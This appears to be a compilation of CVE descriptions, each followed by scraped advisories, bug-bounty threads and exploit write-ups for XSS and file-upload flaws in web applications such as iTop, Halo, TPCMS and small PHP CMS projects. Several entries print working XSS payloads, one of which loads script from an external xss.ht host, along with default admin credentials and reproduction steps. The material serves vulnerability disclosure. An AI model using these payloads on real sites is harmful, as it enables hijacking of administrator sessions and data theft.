A Cross Site Scripting (XSS) vulnerability exists in Exrick XMall Admin Panel as of 11/7/2021 via the GET parameter in product-add.jsp.

CVE-2021-43432: xmall/product-add.jsp at b146cceb21ca42d4237f31dbd7af5ced49048a56 · Exrick/xmall

When creating or updating credentials for single-user access, Apache NiFi wrote a copy of the Login Identity Providers configuration to the operating system temporary directory. On most platforms, the operating system temporary directory has global read permissions. NiFi immediately moved the temporary file to the final configuration directory, which significantly limited the window of opportunity for access. NiFi 1.16.0 includes updates to replace the Login Identity Providers configuration without writing a file to the operating system temporary directory.

CVE-2022-26850: Apache NiFi Security Reports

Combodi iTop is a web based IT Service Management tool. Prior to versions 2.7.6 and 3.0.0, cross-site scripting is possible for scripts outside of script tags when displaying HTML attachments. This issue is fixed in versions 2.7.6 and 3.0.0. There are currently no known workarounds.

Valid

Reported on

Jun 30th 2021

**💥 BUG**

stored xss via file upload

**💥 STEP TO REPRODUCE**

here in this case i uploaded a html file with xss payload inside.  
Plz check this 1 minute video to reproduce https://drive.google.com/file/d/1xKqYFgrsFUfp9Ufe4XiATQcAL-Q6Mr9G/view?usp=sharing

**💥 Impact**

I see there is many different type of role base user . So, user who has permission to upload document can make xss attack against higher level user or admin

![](https://avatars.githubusercontent.com/u/25035884?v=4)

![](https://avatars.githubusercontent.com/u/28839565?v=4)

Z-Old

commented 9 months ago

Admin

Hey ranjit-git, I've just emailed the maintainer and am waiting to hear back. Good job!

We have contacted a member of the combodo/itop team and are waiting to hear back 9 months ago

![](https://github.com/combodo.png)

A combodo/itop maintainer validated this vulnerability 5 months ago

The fix bounty is now up for grabs

![](https://github.com/combodo.png)

commented 3 months ago

Maintainer

The fix will be part of 2.7.6 that has just been released. A GitHub advisory was created : https://github.com/Combodo/iTop/security/advisories/GHSA-67x5-mqg4-rvgc

We will publish ths page and the advusory in 3 monthes.

![](https://avatars.githubusercontent.com/u/8947448?v=4)

The fix bounty has been dropped

![](https://avatars.githubusercontent.com/u/8947448?v=4)

Hi, Combodo usually send goodies for its contributors, as a way to thank them. @ranjit-git can you send your postal address to pierre.goiffon @ combodo.com (remove spaces around the @)?

![](https://avatars.githubusercontent.com/u/25035884?v=4)

@mainatiner Thanks for such care. Happy to secure itop project. I will send postal address to above mail id

to join this conversation

![](https://avatars.githubusercontent.com/u/25035884?v=4)

![](https://avatars.githubusercontent.com/u/28839565?v=4)

Z-Old

commented 9 months ago

Admin

Hey ranjit-git, I've just emailed the maintainer and am waiting to hear back. Good job!

We have contacted a member of the combodo/itop team and are waiting to hear back 9 months ago

![](https://github.com/combodo.png)

A combodo/itop maintainer validated this vulnerability 5 months ago

The fix bounty is now up for grabs

![](https://github.com/combodo.png)

commented 3 months ago

Maintainer

The fix will be part of 2.7.6 that has just been released. A GitHub advisory was created : https://github.com/Combodo/iTop/security/advisories/GHSA-67x5-mqg4-rvgc

We will publish ths page and the advusory in 3 monthes.

![](https://avatars.githubusercontent.com/u/8947448?v=4)

The fix bounty has been dropped

![](https://avatars.githubusercontent.com/u/8947448?v=4)

Hi, Combodo usually send goodies for its contributors, as a way to thank them. @ranjit-git can you send your postal address to pierre.goiffon @ combodo.com (remove spaces around the @)?

![](https://avatars.githubusercontent.com/u/25035884?v=4)

@mainatiner Thanks for such care. Happy to secure itop project. I will send postal address to above mail id

to join this conversation

CVE-2022-24811: Cross-site Scripting (XSS) - Stored in itop

Simple Student Information System v1.0 was discovered to contain a SQL injection vulnerability via add/Student.

\# Exploit Title: Student Information System - Blind XSS

\# Exploit Author: NS Kumar (n1\_x)

\# Vendor Name: oretnom23

\# Vendor Homepage: https://www.sourcecodester.com/php/15147/simple-student-information-system-phpoop-free-source-code.html

\# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/sis\_0\_1.zip

\# Version: v1.0

\# Tested on: Parrot GNU/Linux 4.10, Apache

\# CVE: ytd

\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`Description:\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`

\-

A Blind XSS issue in Student Information System v.1.0 allows to inject Arbitrary JavaScript via add /Student.

\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`Payload used:\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`

"><script src=https://d4.xss.ht></script>

\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`Steps to reproduce:\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`

1- Go to http://victim.com

2- In "staff portal" option, paste the payload in student first name.

3- Then goto your xss hunter, You will see xss fires alert.

\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`

CVE-2022-24231: OpenSource/Blind_XSS at main · nsparker1337/OpenSource

A cross-site scripting (XSS) vulnerability in College Website Content Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the User Profile Name text fields.

\# Exploit Title: College Website - Content Management System v1.0 - Stored(Blind) Cross Site Scripting(XSS)

\# Exploit Author: NS Kumar (n1\_x)

\# Date: March 4, 2022

\# Vendor Homepage: https://www.sourcecodester.com/php/15203/college-website-content-management-system-phpoop-free-source-code.html

\# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/cwms.zip

\# Tested on: Parrot Linux, Apache, Mysql

\# Vendor: oretnom23

\# Version: v1.0

\# Exploit Description:

\# College Website - Content Management System v1.0 suffers from Stored(Blind) XSS Injection Vulnerability allowing remote attackers to gain admin access and view internal IPs.

\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`To Exploit\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`

Step 1: Goto Profile Page

Step 2: Put XSS Hunter or Any other Payload on Either First Name or Last Name field

Step 3: Wait for Admin to view your details or Just Reload the page you can see the popup shows up

Step 4: Then you will see xss fires alert on xss hunter page

Payload Used for this Exploit: "><script src=https://d4.xss.ht></script> or <script>confirm('Testing for XSS')</script>

\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`

CVE-2022-26615: OpenSource/exploit_xss_cwms at main · nsparker1337/OpenSource

Halo Blog CMS v1.4.17 was discovered to allow attackers to upload arbitrary files via the Attachment Upload function.

**是什么版本出现了此问题？**

1.4.17

**使用的什么数据库？**

MySQL 5.7

**使用的哪种方式部署？**

Fat Jar

**在线站点地址**

https://demo.halo.run/admin/index.html#/comments

**发生了什么？**

The vulnerability can lead to the upload of arbitrary malicious script files.

**相关日志输出****附加信息**

Black-box penetration：

1.  Use (demo:P@ssw0rd123...) to login in https://demo.halo.run/admin ,and then find the  
    attachment upload feature ,try to upload a random image.

![图片](https://user-images.githubusercontent.com/63443757/156746391-9308664e-4a0f-481d-a123-c7441cf32769.png)

2.  While uploading a random image, use burp suite to catch the request packet and forward it to the Repeater module.

![图片](https://user-images.githubusercontent.com/63443757/156746407-bb1dd699-9ca8-4553-958c-164af36173d9.png)

3.  You can tell we successfully uploaded the image from the screenshot below . And we can also get the path of the image accordding to the response.

![图片](https://user-images.githubusercontent.com/63443757/156746420-ebe7c2e6-0d00-491c-85e2-a1885c9c198c.png)

4.  Now we want to use the feature again. This time ,try to change the file suffix and modify the file content at the same time. After doing that , send the request again. And the upload is still successful , the file path is also returned.

![图片](https://user-images.githubusercontent.com/63443757/156746430-b8d6548e-65bd-4c9d-b27e-e6c6838004ca.png)

5.  Now try to access the file path within the url below,and our xss payload successfully executed

![图片](https://user-images.githubusercontent.com/63443757/156746443-6d9ee71d-a7a5-43e2-9d45-715e13104276.png)

6.  Screenshots of other file types uploaded are as follows：

![图片](https://user-images.githubusercontent.com/63443757/156746458-b35a4df8-6bf8-4330-9a4c-eb22aa994da5.png)

![图片](https://user-images.githubusercontent.com/63443757/156746467-86e3b944-538c-49f4-8edb-e899057ae513.png)

Source code review：  
Try to download the source code for source code security analysis  
https://github.com/halo-dev/halo/releases/tag/v1.4.17（Latest version 1.4.17）

![图片](https://user-images.githubusercontent.com/63443757/156746509-1706562c-f7bf-4afb-9622-796aec75c324.png)

7.  Check the source code and locate the class src\\main\\java\\run\\halo\\app\\controller\\admin\\api\\AttachmentController.java  
    According to the annotations of this class, you can find that all requests to the path /api/admin/attachments will access this class.

![图片](https://user-images.githubusercontent.com/63443757/156746523-473c4010-9ff8-4509-bd7f-f80988be40f4.png)

8.  The /upload path accessed by the upload interface will access the uploadAttachment method of this class.

![图片](https://user-images.githubusercontent.com/63443757/156746532-a57e34cd-1627-4bb5-bd34-5b65e0e90a71.png)

9.  As you can see, this method receives the file from the client side, then passes the file object as an argument to the upload() method of the AttachmentServiceImpl class and executes it, and then executes the result as an argument to the convertToDto() method of the AttachmentServiceImpl class.
10.  So let's follow up on the upload() method first after locating the src\\main\\java\\run\\halo\\app\\service\\impl\\AttachmentServiceImpl.java class and dive into the upload() method

![图片](https://user-images.githubusercontent.com/63443757/156746551-998eb7d5-af12-4d6d-9768-09b8b1c0f82d.png)

11.  You can see that the code does not have any file suffix checksum, and finally the upload() method will return a create(attachment) object, continue to follow up to the create() method, you can see that an Attachment class object is returned, and there is no file checksum.

![图片](https://user-images.githubusercontent.com/63443757/156746569-4053afc0-e4fa-436e-9bf3-2b394389e249.png)

12.  The returned object is entered as an argument to the convertToDto() method of the src\\main\\java\\run\\halo\\app\\service\\impl\\AttachmentServiceImpl.java class, in which you can see that the code writes the path of the uploaded file to the AttachmentDTO instance object, and it can be found that there is no logic of permission checking, and finally the method returns an AttachmentDTO instance object.

![图片](https://user-images.githubusercontent.com/63443757/156746581-00a7ff3b-9d56-4a2a-ad3a-c1edec819a9d.png)

13.  When the file path is set, this information will be brought into the response packet and eventually fed back to the client, so we can successfully access the uploaded file in the response packet based on this path information。
14.  According to the analysis of the above code, we can see that there is no logic in the code to check the file suffix, file content and file format, so it can lead to arbitrary file upload。

CVE-2022-26619: Halo Blog CMS1.4.17 Fileupload without file type authentication · Issue #1702 · halo-dev/halo

A stored cross-site scripting (XSS) vulnerability in TPCMS v3.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Phone text box.

Logging into the management system of tpcms v3.2 (admin/admin888), in the "System Settings"-"Site Configuration"-"Bottom Information"(or "Phone"), entering XSS payload and save it. Open the front-site and you can see the pop-up window caused by the XSS payload.

URL:  
http://IP/index.php/Admin/Index/index.html

Payload:

<script>alert('hello ');</script>

![Image description](https://images.gitee.com/uploads/images/2021/0702/142201_d77d842b_9371028.png "1.png")

![Image description](https://images.gitee.com/uploads/images/2021/0702/142221_8dda90de_9371028.png "2.png")

![Image description](https://images.gitee.com/uploads/images/2021/0702/142231_bc642a93_9371028.png "3.png")

![Image description](https://images.gitee.com/uploads/images/2021/0702/142239_d220979b_9371028.png "3_1.png")

This vulnerability can be used in conjunction with the XSS platform. The attacker enters the malicious payload in the corresponding text box. Whenever the visitor visits the TPCMS, the visitor's information can be sent to the XSS platform.It can be used to Phising or something else.

![Image description](https://images.gitee.com/uploads/images/2021/0702/142249_90ef59c2_9371028.png "4.png")

CVE-2022-27441: XSS storage vulnerability exists in tpcms v3.2 management system · Issue #I3YUCJ · 快乐源泉/tpcms - Gitee.com

Authenticated (subscriber or higher user role if allowed to access projects) Stored Cross-Site Scripting (XSS) vulnerability in weDevs WP Project Manager plugin <= 2.4.13 versions.

**Solution**

Update the WordPress WP Subscribe plugin to the latest available version (at least 2.4.14).

Jörgson discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress WP Project Manager Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has been fixed in version 2.4.14.

**2 other known vulnerabilities for this plugin**To plugin page

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2021-36826: WordPress WP Project Manager plugin <= 2.4.13 - Stored Cross-Site Scripting (XSS) vulnerability - Patchstack

Authenticated Persistent Cross-Site Scripting (XSS) vulnerability in FV Flowplayer Video Player (WordPress plugin) versions <= 7.5.18.727 via &fv_wp_flowplayer_field_splash parameter.

**fv-wordpress-flowplayer**

**Software**

**FV Flowplayer Video Player**

**Vulnerable Versions**

**<= 7.5.18.727**

**Fixed in version**

**7.5.19.727**

**CVE**

**CVE-2022-25613**

**References**

**Credits**

**Classification**

**Cross Site Scripting (XSS)**

**OWASP Top 10**

**A7: Cross-Site Scripting (XSS)**

**Disclosure Date**

**2022-04-04**

**CVSS 3.0 score**

**Requires contributor or higher role user authentication.**

**Are your websites subject to this vulnerability?**

**Details**

**Authenticated Persistent Cross-Site Scripting (XSS) vulnerability discovered by Ex.Mi (Patchstack) in WordPress FV Flowplayer Video Player plugin (versions <= 7.5.18.727).**

**Solution**

**Update the WordPress FV Flowplayer Video Player plugin to the latest available version (at least 7.5.19.727).**

**Found a vulnerability that puts your sites at risk?**

**Found a vulnerability? Help us secure the web and join our community of ethical hackers.**

**Are you the developer of this software? Hire our researchers for a thorough security audit.**

CVE-2022-25613: WordPress FV Flowplayer Video Player plugin <= 7.5.18.727 - Authenticated Persistent Cross-Site Scripting (XSS) vulnerability - Patchstack

Authenticated (admin+) Stored Cross-Site Scripting (XSS) vulnerability in wpDataTables (WordPress plugin) versions <= 2.1.27

Tag

#xss